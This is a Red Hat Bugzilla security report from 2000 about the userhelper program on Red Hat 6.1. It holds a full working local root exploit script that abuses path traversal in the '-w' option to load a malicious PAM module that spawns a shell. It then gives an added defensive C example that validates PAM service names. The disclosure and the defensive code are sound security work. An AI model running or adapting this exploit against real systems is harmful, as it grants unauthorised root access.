Bug 9825 - pam crackable
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: usermode
6.1
All Linux
medium Severity medium
Assigned To: Nalin Dahyabhai
: Security
Reported: 2000-02-28 06:53 EST by Rakesh Tiwari
Modified: 2008-05-01 11:37 EDT (History)
Doc Type: Bug Fix
Last Closed: 2000-02-28 10:50:12 EST
Description Rakesh Tiwari 2000-02-28 06:53:33 EST
By using the script, any normal user on a Red Hat 6.1 server is able to get
'root' rights. The 'id' gets changed to 'root'.
#!/bin/sh
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O


echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s
Comment 1 Bill Nottingham 2000-02-28 10:50:59 EST
This has already been fixed in the errata releases...
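
The `-w` argument in the script above uses `../` components to point userhelper at a configuration file the user wrote. As an added example (not code from this report or from the errata packages), one way a privileged helper can validate a service name before building a PAM configuration path from it; `service_name_ok`, `pam_conf_path`, the `/etc/pam.d` directory and the length limit are assumptions made for the illustration.

```c
/* Added example: allow-list check on a PAM service name (not the errata code). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PAM_CONF_DIR "/etc/pam.d"   /* assumption: standard Linux-PAM directory */
#define MAX_SERVICE_LEN 64          /* assumption: arbitrary upper bound */

/* Return 1 if name is a plain file name safe to append to PAM_CONF_DIR. */
int service_name_ok(const char *name)
{
    size_t len, i;
    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > MAX_SERVICE_LEN)
        return 0;
    if (name[0] == '.')                 /* rejects ".", ".." and hidden files */
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        /* allow-list: '/' is never accepted, so the name stays in PAM_CONF_DIR */
        if (!isalnum(c) && c != '-' && c != '_' && c != '.')
            return 0;
    }
    return 1;
}

/* Build the config path for a validated name; 0 on success, -1 on rejection. */
int pam_conf_path(const char *name, char *out, size_t outlen)
{
    int n;
    if (!service_name_ok(name))
        return -1;
    n = snprintf(out, outlen, "%s/%s", PAM_CONF_DIR, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;   /* truncation is a failure */
}

int main(void)
{
    /* constructed inputs: an ordinary name and one shaped like the report's -w argument */
    const char *samples[] = { "linuxconf", "../../../home/user/_pamslam.conf" };
    char path[128];
    for (size_t i = 0; i < 2; i++)
        printf("%-36s -> %s\n", samples[i],
               pam_conf_path(samples[i], path, sizeof path) == 0 ? path : "rejected");
    return 0;
}
```

The check runs before any file is opened, so a rejected name never reaches the PAM library or the dynamic loader.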
